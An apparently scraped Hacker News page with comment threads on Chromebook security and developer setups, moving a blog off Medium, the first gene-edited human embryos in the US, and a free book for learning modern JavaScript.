Well, it's possible to temporarily unlock firmware write protection, replace Google's key with your own, and run self-signed kernels and an arbitrary distribution securely. But indeed, I haven't heard of anyone actually going through the effort to do so.

cjsuk 5 days ago 1 reply      
Yubikeys tend to wear out your USB ports after a bit I found, at least on my X201 and the X61 that preceded it.
albertgoeswoof 4 days ago 2 replies      
What's the alternative solution for a cloud/remote based factory wipe, travel and restore? Is there anything on Linux that offers the same quality of user experience without being hampered by chromeOS and dealing with Google/a 3rd party?
talkingtab 5 days ago 2 replies      
I have a potential application for a U2F keys and I'm wondering why you recommend the $18 Yubikey on Amazon versus the $10 one that is also FIDO certified. Is there a difference in the function or some other important difference?
bgrohman 4 days ago 0 replies      
"As far as Debian/Ubuntu (and crouton), that's fine as far as it goes, but then you don't end up with a Chromebook, just a cheap mini-notebook with flaky drivers."

Hmm, I'm not sure about that. I went the Crouton route on my $169 Chromebook, and now I have both ChromeOS and Ubuntu, and I can switch between them quickly. And if I understand Crouton correctly, the chroot actually uses the same kernel and drivers as ChromeOS. I haven't had any driver issues. It's also easy to set up encryption for your chroot. I think it's a good solution.
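For anyone curious, the Crouton route mentioned above boils down to a few commands. This is a hedged sketch based on the crouton README; the release (`-r xenial`) and target (`-t xfce`) names are illustrative choices, not the only options:

```shell
# 0. Put the Chromebook in developer mode, download crouton to ~/Downloads,
#    then open the crosh shell (Ctrl+Alt+T -> "shell").
sudo sh ~/Downloads/crouton -r xenial -t xfce -e   # -e encrypts the chroot

# Later, enter the chroot's desktop with:
sudo startxfce4            # or a plain shell: sudo enter-chroot
```

The `-e` flag is what gives you the encrypted chroot mentioned in the comment above.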

kasey_junk 5 days ago 1 reply      
Does ChromeOS allow you to remote-wipe the box? It seems like that would be another advantage of this in the case of theft (note: definitely not in the case of the box being confiscated by a lawful authority).
korzun 5 days ago 1 reply      
I have been using the YubiKey for over a year now, and the novelty wore off.

I lost my key a couple of weeks ago and was surprised how easy it was to get back into my accounts with just my phone. There is no point in using something like this if providers let you fail over to more conventional authentication methods without any hassle; the keys are useless then. They are not going to add manual verification for the couple of people who lost their YubiKey.

YubiKey is useful for instances when you want to grant somebody access to something with just a key. I don't see it going beyond that anytime soon.

geogriffin 4 days ago 0 replies      
The ChromeOS security model praised in this article seems too conservative for devs to me, considering the inconvenience trade-offs:

- Persistent state is discouraged, but not disallowed. In fact, when the browser is exploited, any and all internal state necessarily must be accessible and modifiable. I'm taking an educated guess that persistent browser-internal state is less guarded against exploitation than external inputs.

- Once pwned, most of your important data can probably be captured and accounts taken over before you ever decide to reboot. It's a PITA to have to reboot before accessing anything sensitive; no one should have to think/remember to do that. (Maybe if ChromeOS were serious about preventing persistent threats, they'd force a reboot every night?)

- Yes, it's defense in depth, but security is a game of trade-offs, where convenience often trumps technical security mechanisms when it comes to increasing security overall.

I enable dev mode, but I appreciate the "stateless" sentiment in terms of encouraging data backup. I think I end up backing up my data (git push, etc.) more often than I would on a non-ChromeOS laptop, because it "feels" like more of a necessity; especially after my 2-year-old son hit the spacebar during that god-awful dev-mode bootup warning screen and proceeded to factory-reset my Chromebook.

cosatelo 4 days ago 0 replies      
Chrome OS always has me torn. It's a beautiful, well-designed OS with a great concept behind it; however, it's obviously unusable from a privacy standpoint.
grondilu 4 days ago 0 replies      
I used to own a chromebook and I loved it... until it failed.

I had computers fail before, and usually I could manage to repair them somehow, most often by using a Linux live USB. But with this Chromebook, I tried many things and could not do anything. No access to the BIOS, no bootable USB, nothing. A complete black box.

So I'm not sure I'll buy another Chromebook anytime soon.

free_everybody 4 days ago 1 reply      
Great article! Here's a thought.

Why not get a used MacBook Air off eBay for ~$400? Top-notch OS, great support, sturdy design, great battery life...

rkeene2 4 days ago 0 replies      
For those of you using DOD CACs or USG PIVs (NIST SP 800-73) smartcards, there is also CACKey[0] for ChromeOS, of which I am the author.

I worked with Google to port it to ChromeOS when ChromeOS grew certificate provider support.

[0] https://cackey.rkeene.org/

devy 5 days ago 0 replies      
Also, it feels like this Samsung Chromebook 3 is just a tiny bit of an upgrade (I am sure it isn't, but it feels that way) from the famous Dell Mini 9[1] from almost a decade ago.

It was super hackable, and most people who bought it installed a hackintosh on it, with near-perfect hardware compatibility with OS X Snow Leopard. A few friends of mine went to Africa for a few months with a Dell Mini 9 and were able to freelance there with a fully functional yet super affordable hackintosh Mac. I wish Dell would do another of those netbook lines with compatible hardware.

[1] https://en.wikipedia.org/wiki/Dell_Inspiron_Mini_Series#9_Se...

JepZ 5 days ago 1 reply      
While I like the idea and the listed apps are just awesome (didn't know about termux, wow), the whole setup depends too much on google services for my taste :-/
limeblack 4 days ago 0 replies      
I have tried using Chrome OS as my main device, and I'm basically going to use this post to rant a little. Why does Chrome OS have to use basically a dock, like Macs?

I would love and probably use Chrome OS as main device if it looked like this: https://i.stack.imgur.com/9MCqo.png

m-j-fox 5 days ago 1 reply      
Cool. Question: what are your editor options? Any GUI-based Emacs or Atom? If not, do you at least have text-based Emacs in Termux?
ufmace 3 days ago 0 replies      
Anyone know why the author seems to be setting up to SSH into Termux? It looks like Termux itself has a perfectly good console, what's the deal with trying to SSH into it from a local client?
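(For context, the Termux side of the SSH setup being asked about is only a few commands. This sketch assumes a stock Termux install, whose sshd runs without root and listens on port 8022 by default:)

```shell
pkg install openssh    # Termux's package manager
passwd                 # set the password sshd will accept
sshd                   # start the OpenSSH server on port 8022

# Then, from another machine on the same network:
#   ssh -p 8022 <device-ip>
```

One plausible answer to the question: an external SSH client gives you a real keyboard, copy/paste, and your usual terminal emulator, which Termux's on-device console can't match.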
omnifischer 5 days ago 0 replies      
Wondering if Google would themselves launch such a workspace: https://www.youtube.com/watch?v=mfLc4U8pnPk
The idea is to have a VNC/remote-desktop style machine on AWS. You'd need only a client (a secure ChromeOS device).
jhoechtl 5 days ago 1 reply      
This certainly makes a great dev environment for Go, since Go has very reasonable requirements for development.
tkubacki 5 days ago 0 replies      
My current view is that the best thing an average full-stack dev can do is still to buy a beefy desktop with Linux/Nvidia plus Windows in VirtualBox/VMware (for Windows stuff). An additional cheap Chromebook is nice, but e.g. IntelliJ is too heavy for it.
noja 5 days ago 1 reply      
What does this achieve? How does this stop anyone from compelling you to undo your fancy setup?
math0ne 4 days ago 0 replies      
Some cool ideas at play here, but Termux is so limiting I would have a hard time getting any real work done.
digi_owl 5 days ago 0 replies      
I can't help but wonder if _sec has jumped the shark...
alexnewman 4 days ago 1 reply      
It would be perfect... but there's no copy and paste in Termux.
homakov 5 days ago 0 replies      
Usable? Scanning codes and plastic sticks? Not really
tostitos1979 5 days ago 2 replies      
I'm a bit confused (I only skimmed the article). Is this running Chrome OS or Linux? Can I get Steam games like Stardew Valley to run on it?
kaputsmack 5 days ago 0 replies      
As long as you don't mind Google spying on everything you do.
Why I left Medium and moved back to my own domain arslan.io
472 points by ingve  2 days ago   240 comments top 37
tyingq 1 day ago 8 replies      
"Writing comments to Medium posts feels awkward because each comment is treated as a blog post."

This is also awkward from the reader's point of view. Trying to follow a comment chain on Medium is frustrating, as it only shows the first level; diving in switches pages, and often you need to press a second "load all comments" button. Then it's the back button to wind your way back up.

Is there some sound reasoning for why it was set up this way? Some benefit I'm not seeing?

JoshMnem 1 day ago 27 replies      
I don't understand why people write programming blogs on Medium. I think that managing a live website with its own server (rather than only working on other people's projects) is a very important skill.

If you don't want to manage WordPress, try a static site generator like Metalsmith: https://github.com/segmentio/metalsmith

Deploy on Digital Ocean or Linode for $5/month. Free hosting options include Github Pages and Netlify.
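For the free GitHub Pages option mentioned above, a one-off deploy of a generated static site can be as simple as this sketch (the build script name, output directory, and repo URL are all assumptions for illustration):

```shell
npm run build                      # e.g. a Metalsmith build writing the site to ./build
cd build
git init
git add -A
git commit -m "deploy"
git push -f git@github.com:<user>/<user>.github.io.git master
```

The force-push treats the build output as disposable; the source stays in a separate repo or branch.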

pmontra 1 day ago 1 reply      
About the dickbars:

1) I uBlock them on my phone and tablet. Unfortunately there are plenty of random sites on Medium with their own domain. I don't follow any of them and get there from HN or similar sites. Blocking all of them doesn't make sense because I'll probably never get back to that domain. I agree with the author, the button in the middle of the page really sucks.

2) On desktop, the button and the dickbar never show because I'm running with NoScript and they are a JavaScript thing :-)

The author misses another inconvenient feature of Medium: the login. It's either by OAuth (I don't remember which providers) or by email. That means they send me an email with a link to click to log in. In theory it's ok, because obviously email is safer and more convenient than a password stored in a password manager (/sarcasm). The first time I used it, the mail didn't arrive until the day after, so I've been primed against it. Probably almost everybody just logs in with Facebook or something, so, quoting the author, "I'm not a part of his [Ev Williams'] vision".

Mikho 1 day ago 2 replies      
I switched to Blogger a long time ago--it's free to use your domain, and you can change the template design as much as you like and connect external widgets like Disqus (my blog, to check how Blogger may look: http://blog.babich.me/).

Also, a huge thing is the integration with Google Photos and Google Drive. You can insert photos from Google Photos into a post right from the image-addition menu--no need to hassle with links; just browse Google Photos inside Blogger. BTW, it's possible to see photos uploaded via Blogger in the Google Photos folder inside Google Drive (the Google Photos app itself does not show photos uploaded via Blogger).

You can also connect FeedBurner (a Google company) in the Blogger settings to collect subscription emails and automatically email subscribers via FeedBurner when a new post is published. BTW, every tag used for tagging posts in Blogger becomes a dedicated RSS feed. So if you write about different topics (e.g. coding and travel), it's easy to let people follow the RSS feed or subscribe via email for only the topic they are interested in, not everything you write.

And it's all free!

Medium feels like long-form Twitter with all these replies treated as posts. This is a terrible experience, especially when you follow somebody's RSS feed on Medium and comments and replies are delivered and treated in the feed the same way as posts. I guess it's due to the fact that Ev was also a Twitter founder and has only one construct in his head for posts and replies.

cupcakestand 1 day ago 4 replies      
To-the-point criticism of Medium; very detailed, and the OP picks the right issues with Medium.

While Medium looks so beautiful and clean at first glance, it really disappoints when you use it on a daily basis, both as a creator and as a reader. Every time I use Medium, I am surprised that Medium is successful. Its appearance definitely feels premium and of significantly higher value than any other blog system, but the usability is a nightmare.

So we are back to square one. Which blog system should we use? SSG on Github Pages?

shinzui 1 day ago 1 reply      
The best part of reading technical content is the discussion in the comments. Medium makes that impossible.
Entangled 1 day ago 1 reply      
Medium is a blog platform and a news aggregator. I use it mostly for consuming news by using tags of interest. Good luck with that writing your own blog on your own server. Oh, and the daily newsletter is a delightful joy.

Discoverability is key to the success of Medium.

francis-io 1 day ago 2 replies      
Using something like Jekyll to create a static blog lets you put it on AWS S3. For all but the highest traffic sites the bandwidth cost is trivial and you totally remove all the issues with uptime and securing a server.
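The Jekyll-to-S3 flow described here is roughly two commands (the bucket name is a placeholder, and this assumes the bucket is already configured for static website hosting):

```shell
bundle exec jekyll build                 # writes the generated site to _site/
aws s3 sync _site/ s3://my-blog-bucket --delete --acl public-read
```

`--delete` removes objects that no longer exist in the local build, keeping the bucket an exact mirror of `_site/`.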
illuminea 6 hours ago 0 replies      
From a branding and long-term point of view, it's really important to "own" your content by hosting it on your own domain and even server space. The advantage of a platform like Medium is that it can increase the reach of your content, but it's too risky to go all in with them since who knows how long they'll be around, or what limitations they might add down the line.

But there's a way to have your cake and eat it too: you can publish first on your self-hosted WordPress site, and then republish automatically on Medium with a canonical tag pointing back to your WordPress site. This means you get the SEO and control benefits of WP, and the reach benefits of Medium.

I wrote a guide on how to make this magic happen: https://illuminea.com/ultimate-guide-to-wordpress-medium/. Of course this post is also reposted on Medium with the canonical tag :) https://medium.com/@miriamschwab/6425c2d5e5c4
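What the canonical tag in this scheme boils down to, in the head of the Medium copy (Medium's import tool adds it for you; the URL here is a placeholder for the original WordPress post):

```html
<link rel="canonical" href="https://example.com/2017/my-post/" />
```

This is the signal that tells search engines the WordPress version is the authoritative one, so the Medium copy doesn't compete with it.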

edem 1 day ago 0 replies      
The OP forgot to mention the worst (IMHO) problem: Medium does not support multi-language content (more here: https://medium.com/@oleksiy/multilingual-content-management-...). If I write posts in English or Hungarian it is okay. But when I start to write in both my readers will see unreadable gibberish when they come to my page and half of the content will be noise for them and it can't be helped.

That's why I do it the other way around. I have my own domain and page which runs on a custom Jekyll / GitHub Pages setup and I import stories to Medium from my page.

This way I can keep using medium and get more readers for free but Medium will display the "Originally posted at ..." line at the bottom. Win-win! You should try this out and use Medium for what it is useful for.

alanh 21 hours ago 0 replies      
A commenter on Arslan's post mentions Medium's "foolproof WYSIWYG editor". This surprised me. I find their WYSIWYG editor to be incredibly frustrating, counter-intuitive, limiting, and obnoxious.

Allow me to belabor only the last point.

Imagine typing the following sentence (I'm using a pipe | to show the cursor):

 Clifford is a big dog.
But it's missing something, so you move your insertion point:

 Clifford is a big| dog.
and you type <space>red. In any sane editor, the result will be exactly what you typed:

 Clifford is a big red| dog.
But on Medium, the result is:

 Clifford is a big red|dog.
Clifford is a big reddog? Ffffff. This happened because when you typed the first space after big, the result was not the insertion of a space but in fact the same as if you had hit the "right arrow" key:

 Clifford is a big |dog.
Not cool. I have a strong habit of inserting words with the surrounding spaces already inserted. How dare Medium forbid me to type the way I want?

I know that Medium does this because they are on a crusade to kill the use of two spaces after a sentence. That doesn't excuse the insane frustration of the editing process. No wonder most Medium posts don't look like they have ever experienced the most cursory proofreading!

dhruvkar 1 day ago 0 replies      
I don't think this is an either/or situation.

Medium's value is in exposing new, (arguably) high-quality content to its readers.

Every so often, when you write an extra high-quality article, post it on medium as well, with a way for the reader to subscribe. It'll expose new readers to your writing and you still keep your content on your own platform.

amelius 1 day ago 0 replies      
This is good. Medium is, in a sense, the anti-internet. It centralizes where no centralization is needed.
linopolus 1 day ago 1 reply      
I never understood how writers of any kind would let Medium (or Tumblr, or ...) rip all control out of their hands.
sixQuarks 1 day ago 1 reply      
Moral of the story: Try to never rely on another company's platform for your business. It's hard enough creating a successful business, but to add a layer of risk on top of that is not smart.
s3nnyy 1 day ago 4 replies      
I feel one of the main reasons Medium is so successful is that they cracked discoverability and rank high on Google for any topic (sort of like Wikipedia). Hence, I am hesitant to move away from it although I really want to build a sustainable, long-term business on my own domain.

Any ideas on this?

TheAceOfHearts 1 day ago 0 replies      
Personally, I never write comments on blog posts, but I participate in communities like Hacker News and a couple random subreddits.

I prefer including links to Hacker News or Reddit in the blog post. I'm not interested in handling authentication, moderating users, or dealing with spam. News aggregators usually do a great job with all those points.

The Webmention [0] spec solves this problem, but sadly, it hasn't been widely adopted. :(

[0] https://en.wikipedia.org/wiki/Webmention

ngsayjoe 1 day ago 1 reply      
I recently wanted to move my personal Tumblr blog to Medium. However, after a few days of nightmare, still unable to set up a custom domain despite having paid the $75 fee, I requested a refund and closed my account. Their customer service and documentation kind of suck!
bhalp1 1 day ago 0 replies      
At https://dev.to we have a similar product to Medium in a lot of ways. One thing we try to do is offer the benefits of Medium in terms of distribution, but also encourage users to easily make their own site the canonical source, because we don't want to force vendor lock in when you get to this point.

I'd like to think we also do a good job dealing with a lot of the UX issues that the author outlines :)

alanh 21 hours ago 0 replies      
Not to be a horrible self-promoter (it's just the ideas I care about), but my 2012 discussion of the problem with new blogging platforms still applies, from a general perspective, to Medium: https://alanhogan.com/the-problem-with-new-blog-platforms. (tl;dr is that eventually you will grow out of virtually any non-WordPress platform, especially one you don't control yourself.)
ewanm89 1 day ago 4 replies      
Why lose flexibility and switch to medium in the first place?
zabil 1 day ago 0 replies      
It's not easy to run a team (engineering) blog with static site generators. Authoring in Markdown, reviewing, external contributions, etc. take up a lot of time.

With medium we've encouraged the team to run personal blogs and add interested articles to the team publication. It's a bottom up approach.

In return, we get viewership when Medium recommends our articles on other (Medium) blogs or via tags. Medium has a sense of community. Speaking strictly for myself, running your own site is a tad selfish; it lacks a sense of community. Right now Medium provides that; we'd only move off Medium if something did it better.

erikb 1 day ago 0 replies      
I find the first part particularly interesting. I always contemplated whether or not I should start blogging. And for me it always seemed an obvious choice between hosting my own blog, which would mean a lot of energy and money, and starting a Medium page, possibly losing control over my texts and page views.

Now that you say it's a hassle to set up and even costs money, why should anybody use Medium? Do people not know how much they are already gifting a platform by letting it host their content? They should pay you, and not the other way around.

luord 1 day ago 0 replies      
I had no interest in using medium, but this is one extra little reason for not fixing my unbroken pelican+GitLab pages setup.
Goladus 1 day ago 1 reply      
Why remove all your posts from medium.com? Why not post to both wordpress and medium.com?
denisehilton 1 day ago 0 replies      
Does Medium allow you to monetize your content and run ads? If not, why do people write for Medium? What's there to gain?
owens99 1 day ago 0 replies      
Medium is blocked in China. And there are as many people learning English in China as the entire US population.

That's the biggest deal breaker for me.

pgeorgep 1 day ago 0 replies      
Interesting read. Personally, I prefer Medium for the convenience.
xerophyte12932 1 day ago 0 replies      
Irony: I am getting a "This site can't be reached".
skyisblue 1 day ago 0 replies      
One thing that really annoys me is that embedded gists don't render in Medium's mobile app.
maxraz 1 day ago 0 replies      
Setting up a domain was difficult. Really?
nvr219 1 day ago 0 replies      
Privacy Badger blocks most medium sites for me :)
abiox 1 day ago 0 replies      
I generally avoid medium.com blogs because the UI is bad. I hate the comments system.
tomerbd 1 day ago 1 reply      
May I ask which theme you use? It looks very nice.
crispytx 1 day ago 0 replies      
My blog is hosted by Medium on my own domain and I think it kicks ass. All of the issues the author brought up in his post seemed pretty minor to me. Just my opinion, but Medium has the best blogging software out there, by far.
tomerbd 1 day ago 0 replies      
I did some Google searches for

"gatsby themes" and "gatsby disqus"

Almost nothing useful turns up... any ideas?

First Human Embryos Edited in U.S technologyreview.com
442 points by astdb  5 days ago   276 comments top 35
plaidfuji 5 days ago 6 replies      
I've seen most of these arguments for and against gene editing before, but the fact of the matter is that it will come down to the economic competitiveness of nations, as always.

What concerns me in the long term is that gene editing will cause human genomes to converge to a single gold standard with proven mental and physical benefits, thereby reducing our species' genetic diversity and leaving us more vulnerable to a mass extinction event. A "zero day exploit" that everyone missed in the popular new cancer-fighting edit.

eggie 5 days ago 5 replies      
We would need a very particular set of conditions for embryonic editing to be justifiable under a medical dogma that aims to "do no harm." Both parents would need to carry a large common set of recessive deleterious alleles, as this would make embryonic selection of non-carriers very difficult. Then we would need the editing system to be so reliable as to not introduce off-target mutations. In a preimplantation setting, we can't easily observe if non-desired mutations have been introduced in some cells, as this would require sequencing every cell in the developing embryo. Serious disease introduced through chimeric errors in the editing process would be a real possibility, and there is no feasible way we could guard against this result using sequencing as it would require destruction of the embryo.

A more realistic scenario would be to develop a human embryonic stem cell culture that has been edited as desired and then implant this into a developing blastocyst at a point at which it would take over and develop into the fetus. This is done with mice and there is no reason it wouldn't work for humans. I think that most people would find this much more abhorrent than directly editing the germline. However, it would be much safer for the engineered proband and would not require a "perfect" editing system that we do not have.

sethbannon 5 days ago 5 replies      
I am so insanely excited for the potential of this technology. There are many ethical questions here, but the potential benefits far outweigh the downsides. In the near future, we can detect and eliminate genetic disorders, ensuring no child has to suffer from these defects any longer. Long term, this gives us a tool to take control of our own evolution in a way never before possible.

Couldn't be more excited for what's possible.

kanzure 5 days ago 4 replies      
here's a TODO list i made for possibly interesting genome editing targets: http://diyhpl.us/wiki/genetic-modifications/

Many of these have low demonstrated correlation or significance so don't just blindly load everything on that document into your at-home CRISPR kit http://www.the-odin.com/gene-engineering-kits/ but it should be a good starting point for thinking about what can be modified, improved, disimproved, etc.

artur_makly 5 days ago 1 reply      
"Although none of the embryos were allowed to develop for more than a few daysand there was never any intention of implanting them into a womb"

Oh, I'm sure human trials have begun by the time mass articles like this surface.

I've met young genetics research students who told me they went to work for labs based in Latam simply because they were allowed to perform experiments deemed illegal in the US, to get a precious few years of a head start.

albertTJames 5 days ago 2 replies      
Ethics questions need to be raised now, and guidelines have to be decided. The future of humanity is in gene editing. The fate of humanity should not depend on the laziness of lawmakers and the outrage of god-fearing creatures. It is time we took our evolution into our own hands.
dr_ 5 days ago 4 replies      
I realize that the scientific consensus is that gene editing should not be permitted to enhance human performance, be it mental or physical. But if one nation ignores this consensus and starts producing "super humans", wouldn't other nations be compelled to follow? Otherwise, over time, wouldn't their citizens, and their nation, slowly fall behind as a country of power and status? Just a thought.
WalterBright 5 days ago 5 replies      
Gene editing is probably the only way humans can colonize space. By adapting people to different gravities, air chemistry and pressure, radiation, etc., the need for life support equipment can be significantly reduced, and the quality of life of the colonists can be improved.
pcnonpc 5 days ago 2 replies      
"The BGI Cognitive Genomics Project is currently doing whole-genome sequencing of 1,000 very-high-IQ people around the world, hunting for sets of sets of IQ-predicting alleles. I know because I recently contributed my DNA to the project, not fully understanding the implications. These IQ gene-sets will be found eventuallybut will probably be used mostly in China, for China. Potentially, the results would allow all Chinese couples to maximize the intelligence of their offspring by selecting among their own fertilized eggs for the one or two that include the highest likelihood of the highest intelligence. Given the Mendelian genetic lottery, the kids produced by any one couple typically differ by 5 to 15 IQ points. So this method of "preimplantation embryo selection" might allow IQ within every Chinese family to increase by 5 to 15 IQ points per generation. After a couple of generations, it would be game over for Western global competitiveness."


What do you think about this? From what I gather, the Chinese and much of East Asia do not have cultural resistance against using genetic engineering to increase their children's IQs. I will even guess that the governments will encourage their populations to use it.

Will the US, in particular the educated portion of the population, will adopt the practice soon after it is proven safe?

If China starts to do that en masse, Europe and the US will likely criticize them initially. Will they then be forced to adopt the practice soon afterwards? If so, how many years of lag approximately? How much resistance will there be on adopting the practice especially considering the left's belief on everyone's fundamental equality?

The denial about the importance of intelligence is quite obvious now, at least among a significant percentage of Americans and Europeans. (They claim "hard work and culture are what matter", ignoring twin and adoption studies.) Will they wait for 1-2 generations, until it's so obvious they cannot compete, before they start to use genetic engineering themselves?

roceasta 5 days ago 2 replies      
The talk is of 'genetic enhancement' but the potential benefit seems more boring and necessary to me: removal of many new and as-yet-unidentified mutations. It is thought that these have been accumulating generation by generation since about 1800 when child mortality started to fall.
thosakwe 5 days ago 3 replies      
In my class just Monday, we watched a film titled Gattaca, which tells the story of a society fueled by eugenics, where most births are in-vitro modified babies, and there is clear discrimination against those with "imperfect" genes. It's crazy how close these things are to reality.
Mikeb85 5 days ago 2 replies      
As if there wasn't enough inequality in the world, now the rich will be able to afford to make their offspring genetically superior to everyone else's. Have fun with a 1% that are literally overlords.
chiefalchemist 5 days ago 1 reply      
Wasn't there a HN post/thread a week or so ago about some scientist having a (new-ish) theory about DNA and the role specific genes play? If there's enough doubt that there's still room for other theories, is CRISPR really a good idea?
noir-york 5 days ago 1 reply      
Evolution made us, then we discovered it, and now we can directly code it.

Pity evolution didn't give us the intelligence, restraint and good judgement to make sure that we will not screw this up. And we will.

A myriad of reasons will be given. Medical reasons - how could one refuse? Then parents: "Harvard is expensive and I want to give my child the best chance I can afford". Then nation states will feel pressure to 'level the genetic playing field'.

On the other hand, with AI soon replacing us, apparently, we can fight back and enhance ourselves!

greendestiny_re 1 day ago 0 replies      
I'm eager to see the long-term results of the gene editing procedures.

>The earlier Chinese publications, although limited in scope, found CRISPR caused editing errors and that the desired DNA changes were taken up not by all the cells of an embryo, only some.

Instability is an inherent property of genes.

mmirate 5 days ago 1 reply      
Well this is exciting, but hopefully it will advance beyond "genetic disease". Or maybe in the future we will be able to expand our definition of that term, to include all genetic predispositions to suboptimal traits? (e.g. slow observation-decision loop, hedonism, sentimentalism/too-much-empathy, neuroticism, etc.)

Either way - hopefully, when this tech is completed, we will be able to accept and enjoy that our descendants will literally be superior beings to us, and not look upon them with too much envy.

djohnston 4 days ago 0 replies      
We already have a clear division in health along socioeconomic lines, but deliberately encoding our inequalities into our DNA is a future I could skip.
Noos 3 days ago 0 replies      
I don't think the modest rise in IQ would be worth a society that considers children products they can alter to specification. Bill McKibben, in Enough, wrote eloquently about the existential dread that could follow if we somehow managed to select for musical skill, for example. It's one thing to deal with your talent or lack of it in terms of the randomness of normal life, another thing to realize you are little more than a racehorse that has been bred because your parents want you to be something.
patkai 3 days ago 0 replies      
I know very little about this topic, but let me shoot: isn't this method for improving competitiveness misguided and shortsighted? How about working on emotional intelligence, better education and talent management, better food in schools, better child care, more support for disadvantaged families - there is so much we can do... Or is it just not about improving society, but individuals (with deep pockets)?
nonbel 5 days ago 1 reply      
Yet another mainstream news report on CRISPR before any scientific report is available.
k__ 5 days ago 1 reply      
Sounds nice, but I don't want children, I want myself to be improved.
stillhere 4 days ago 0 replies      
Seems like a more socially acceptable form of Eugenics since society seems to value advanced science more than it does traditional mate selection based on desired physical traits.
idibidiart 4 days ago 0 replies      
Evolutionary logic is like a massive legacy codebase without any tests. Fuck with it at your own risk. You could definitely get lucky and improve functionality but you'll never know what you'll be breaking.
gehwartzen 5 days ago 1 reply      
"Now Mitalipov is believed to have broken new ground both in the number of embryos experimented upon and by demonstrating that it is possible to safely and efficiently correct defective genes that cause inherited diseases."

Seems a little early for such a claim based on embryos that only developed for a few days.

vivekd 4 days ago 0 replies      
I think enough people recognize the ethical issues inherent in designer babies that we are in no danger of reaching that point. I think the tech could have great applications in livestock and curing genetic defects.
ysleepy 5 days ago 1 reply      
Why do it on human embryos instead of on any other animal? At this stage, it must be for publicity reasons alone. Tasteless in my view.
analog31 5 days ago 0 replies      
In the future, every dissertation will include in its Acknowledgements section, the student's parents, faculty advisor, and gene editor.
jlebrech 5 days ago 0 replies      
Reactivate Vitamin C synthesis, etc.
ziikutv 5 days ago 0 replies      
Wow, it's a brave new world.
cellis 5 days ago 3 replies      
CRISPR is coming. I seriously think with CRISPR we could see several trillion dollar companies. From cancer and AIDS cures to fundamentally altering what it means to be human, this is all within the near grasp of CRISPR (if what I've been reading is to be believed).
theRhino 5 days ago 0 replies      
question is did they use emacs or vim?
SiempreZeus 4 days ago 0 replies      
You want a Gattaca world?? This is how you get a Gattaca world.
Cozumel 5 days ago 2 replies      
Related: 'Unexpected mutations after CRISPRCas9 editing in vivo' http://www.nature.com/nmeth/journal/v14/n6/full/nmeth.4293.h...
Show HN: The JavaScript Way, a book for learning modern JavaScript from scratch github.com
543 points by bpesquet  4 days ago   108 comments top 16
bpesquet 4 days ago 8 replies      
Hi all, author here.

Backstory: I'm a CS engineer/teacher and this book is a side project started in December 2016. You can read a bit more about it here: https://medium.com/@bpesquet/walk-this-javascript-way-e9c45a....

The writing process is now complete and I'm actively looking for feedback to make the book better. Any opinion or advice about content, pricing, or that hastily created Leanpub cover would be greatly appreciated. However, please keep in mind that this is a self-published effort, still far from polished and open to improvement.

I'd also like this thread to stay focused on the book itself, not on the merits/weaknesses of JavaScript or the usefulness of choosing it as a first programming language.

Thanks in advance!

ryanmarsh 4 days ago 11 replies      
I just got home from teaching JavaScript to a room full of people who've never written a line of code in their life.

This book is missing something critical that most intros to JavaScript overlook:

How does the student set up the plumbing and run their code?

It's amazing how much of a hump this is for many trying to get started. It also amazes me how oblivious most of us programmers are to it.

"Just open Chrome Dev Tools" or "put this in a file and run Node" are really strange computer tasks to someone who has never typed and executed code.

sAbakumoff 4 days ago 1 reply      
I think that the best book ever about JS for everyone, especially for those starting from scratch, is https://github.com/getify/You-Dont-Know-JS. You simply don't need anything else.
le-mark 4 days ago 1 reply      
Very, very nice. I briefly went over some chapters and I especially admire the 'no framework' approach you've taken. I believe there's a real need for a book like this, kudos to you for making it happen! What inspired you to create this?
internalfx 4 days ago 2 replies      
Another great JS book on github...


eksemplar 4 days ago 0 replies      
If you ask me all that you need to know about modern JavaScript is that it exists mainly to sell online learning material.

But I may be a bitter old man and your resource looks pretty good.

ThomPete 4 days ago 1 reply      
This is great!

I am fairly familiar with programming, having done AS, Lingo, and PHP; I understand code when I see it. I am however not a programmer but more a technically oriented product designer, and so I don't get to practice as often.

I have been trying to get into javascript and while I understand all the fundamentals it's still not something that I feel comfortable doing, which is a shame, as it's kind of the language of the internet.

Skimming through this book, it looks like the perfect way for me to spend my next two weeks of vacation, so thank you so much.

Is there a way to donate to you?

Having made something as comprehensive as this, you need to think about how to break it up so that you keep users engaged and so that you can maximise your revenue. Selling books is mostly a spike and then a long slow ramp towards a halt, so make sure you keep your content alive.

If I may come with two suggestions.

1. Make a forum for your readers, perhaps in the form of an online reading group, so that people have someone to go through the book with.

2. Make a step by step email course where you go through the book and have people turn in assignments perhaps even in forums.

3. Let people hire you as a private teacher, perhaps build up a network of private teachers. (Ok that was three suggestions)

These I think would be great ways to monetize.

dotnetkow 4 days ago 0 replies      
Saw this on Reddit last night, poked around on a few pages. It's great! Love the movie list example on this page: https://github.com/bpesquet/thejsway/blob/master/manuscript/.... Going from "for" loops into map/filter/reduce concepts is an excellent way to teach!
partycoder 4 days ago 0 replies      
What all these tutorials omit is the tradeoffs JavaScript and node incur in order to be simple and friendly.

- In JavaScript: no type annotations, numbers are floating point numbers, garbage collected, no multi-threading in the language spec. There are some ways to workaround these limitations, but they're not a part of the language.

- The concurrency model of node, based on the libuv event loop. This dictates what node is good for and what it is not good for. Short-lived tasks = good. Long-lived tasks = bad (service degradation + cascading failures bad)
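Two of those tradeoffs are easy to see in a few lines (my own illustration, not from any tutorial):

```javascript
// 1. All JavaScript numbers are IEEE 754 doubles -- there is no integer type.
console.log(0.1 + 0.2 === 0.3);             // false: binary floats can't represent 0.1 exactly
console.log(Number.isSafeInteger(2 ** 53)); // false: integers above 2^53 - 1 lose precision

// 2. One event loop: a long synchronous task blocks every other callback.
setTimeout(() => console.log("runs only after the busy-wait ends"), 0);
const start = Date.now();
while (Date.now() - start < 50) {} // simulate a long-lived CPU-bound task
```

The second point is why CPU-heavy work in node is usually pushed to worker threads or a separate service.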

leke 4 days ago 0 replies      
I love the tl;dr section. It's basically what I have to do when reading books, in order to recall the essential information without having to read the entire chapter again. Well played.
oblib 2 days ago 0 replies      
I went over a few chapters this afternoon and really enjoyed what you've put together. I'll definitely recommend it to friends who ask me about learning to code.
jchien17 4 days ago 3 replies      
Should one learn ES2015 before learning ES5? Is there any value or need to learn ES5 if you're not maintaining an old codebase?
scottmf 4 days ago 2 replies      
Looks great. I love modern JS, and the faster everyone can move on, the better!

I didn't see any async/await stuff though, is there a reason for that? I'd imagine it would make some code much easier to follow.

noir_lord 4 days ago 0 replies      
This is incredible.

GF wants to learn to program; she has a strong math/finance background and I think she'd be good at programming, but the web can be a bit overwhelming in totality.

